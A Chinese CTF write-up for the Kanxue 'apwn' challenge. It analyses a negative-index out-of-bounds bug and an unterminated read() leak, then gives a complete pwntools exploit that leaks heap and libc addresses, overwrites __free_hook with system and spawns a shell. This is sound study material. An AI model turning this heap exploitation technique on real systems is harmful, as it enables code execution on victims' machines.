本文介绍看雪CTF 拯救单身狗 apwn 一题的漏洞分析与利用思路，供学习参考。
漏洞类型
堆的整数负数溢出
保护机制
全保护
关键代码
if ( two[v1] )//没考虑负数{puts("Oh,singledog,changing your name can bring you good luck.");read(0, (void *)two[v1], 0x20uLL);printf("new name: %s", two[v1]);}
if ( one[v1] )//同样没考虑负数{puts("Oh,luckydog,What is your new name?");read(0, (void *)(one[v1] + 8LL), 0x18uLL);puts("your partner's new name");read(0, *(void **)one[v1], 0x20uLL);}
判断只检查了 two[v1] / one[v1] 指针是否非空，没有检查 int 型的 v1 是否为负：负数下标会访问数组之前的内存，即作者所说的整数负数溢出（本质上是缺少下界检查的越界访问）。修复应在取下标前先判断 v1 < 0 || v1 >= 数组长度。
而且 read 不会在输入末尾补 \x00，随后的 printf("%s") / puts 会一直输出到下一个空字节，把相邻内存中的指针一并打印出来，这就为 leak 创造了条件。
利用思路
1、利用read没有截断leak出libc和堆地址
2、改free_hook为system('/bin/sh')
EXP
from pwn import *
context.os='Linux'
context.arch='amd64'
debug = 1
if debug:
    context.log_level='debug'
cn=process('./apwn')
#cn=process('./the_end',env={'LD_PRELOAD':'./lib/i386-linux-gnu/libc-2.23.so'})
elf=ELF('./apwn')
libc=elf.libc
#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
#libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')


# Thin I/O wrappers around the target tube `cn`.  Every outgoing value goes
# through str(), which is why integer menu choices can be passed directly
# (Python 2 semantics: str and bytes are the same type here).
def s(data):
    """Send str(data) with no trailing newline."""
    return cn.send(str(data))


def sa(delim, data):
    """Wait for delim, then send str(data)."""
    return cn.sendafter(str(delim), str(data))


def st(delim, data):
    """Send str(data), then wait for delim."""
    return cn.sendthen(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return cn.sendline(str(data))


def sla(delim, data):
    """Wait for delim, then send str(data) followed by a newline."""
    return cn.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to numb bytes."""
    return cn.recv(numb)


def rl():
    """Receive one line."""
    return cn.recvline()


def ru(delims):
    """Receive until delims is seen."""
    return cn.recvuntil(delims)


def irt():
    """Hand the tube over to the interactive console."""
    return cn.interactive()


def uu32(data):
    """Unpack a little-endian 32-bit value, right-padding short input with NULs."""
    padded = data.ljust(4, '\0')
    return u32(padded)


def uu64(data):
    """Unpack a little-endian 64-bit value, right-padding short input with NULs."""
    padded = data.ljust(8, '\0')
    return u64(padded)
def create_luckydog(name,partner):
    """Send choice 2 at the '>>' prompt, then the raw name and partner bytes.

    Neither value gets a newline: the target reads fixed-size buffers (see
    the decompiled read() calls in the writeup) and adds no terminator.
    """
    ru('>>')
    sl(2)
    s(name)
    ru("your partner's name")
    s(partner)
def create_singledog(name):
    """Send choice 1 at the '>>' prompt, then the raw name bytes (no newline)."""
    ru('>>')
    sl(1)
    s(name)
def edit_singledog(index,name):
    """Send choice 3, the index as a decimal line, then the raw name bytes.

    index is passed through str(), so a negative value reaches the target's
    signed int parser unchanged.  The decompiled check `if (two[v1])` only
    tests that the slot is non-null and never that v1 >= 0, which is the
    missing lower-bound check this helper is used to demonstrate; a
    `v1 < 0 || v1 >= N` test before indexing would reject it.
    """
    ru('>>')
    sl(3)
    sl(index)
    #ru('Oh,singledog,changing your name can bring you good luck.')
    s(name)
def edit_luckydog(index,name,partner):
    """Send choice 4, the index, then the raw name and partner bytes.

    Per the decompiled snippet the name is read into one[v1]+8 (0x18 bytes)
    and the partner is read through the pointer stored at one[v1]
    (0x20 bytes); the same unchecked signed index applies as for option 3.
    """
    ru('>>')
    sl(4)
    sl(index)
    s(name)
    s(partner)
def dele():
    """Send choice 5 at the '>>' prompt; the target decides which record is removed."""
    ru('>>')
    sl(5)


# Python 2 script: all payload strings below are byte strings.
# Record set-up; the trailing comments are the author's slot annotations.
create_singledog('/bin/sh\x00'+'\x00'*0x18)#two[0]
create_luckydog('b'*0x18,'c'*0x20)#one[0]
create_singledog('/bin/sh\x00')#two[1]
create_luckydog('e'*0x18,'f'*0x20)#one[1]
#leak heap
# Only one byte (0x30) is written, and read() adds no NUL, so the following
# printf("%s") prints the rest of whatever already sat in the buffer --
# presumably a heap pointer left by the two deletes (author rebases by -0x30).
dele()
dele()
create_singledog('\x30')
edit_singledog(0,'\x30')
ru('new name: ')
heap = uu64(r(6))-0x30   # 6 leaked bytes zero-padded to a 64-bit value
success('heap= {}'.format(hex(heap)))
#leak start
'''
edit_singledog(-11,'\x08')
ru('new name: ')
start = uu64(r(6))-0x202008
success('start= {}'.format(hex(start)))
'''
#leak libc
# Negative index: exercises the missing `v1 < 0` check in the decompiled
# `if (two[v1])` test.  The 6 bytes read back are treated as a pointer into
# libc's stdout object (see the symbol subtracted on the next line).
edit_singledog(-11,'\x20')
ru('new name: ')
libc_base = uu64(r(6))-libc.symbols['_IO_2_1_stdout_']#0x3c5620
success('libc_base= {}'.format(hex(libc_base)))
'''
edit_singledog(-4,'11111111')
ru('11111111')
#gdb.attach(cn)
libc_base = uu64(r(6))-0x3ec703 #remote
'''
success('libc_base= {}'.format(hex(libc_base)))
#write free_hook
free_hook=libc_base+libc.symbols['__free_hook']
sys=libc_base+libc.symbols['system']   # NOTE: shadows the stdlib `sys` module name
success('free_hook= {}'.format(hex(free_hook)))
success('system= {}'.format(hex(sys)))
# Index 80 is presumably beyond the array as well (no upper-bound check is
# visible in the decompiled snippet either) -- confirm against the binary.
edit_singledog(80,p64(free_hook))
edit_luckydog(0,'a'*0x18,p64(sys)+'\x00'*0x18)
edit_singledog(80,p64(heap+0x100))
edit_luckydog(0,'a'*0x18,'/bin/sh\x00'+'\x00'*0x18)
#gdb.attach(cn)
dele()
irt()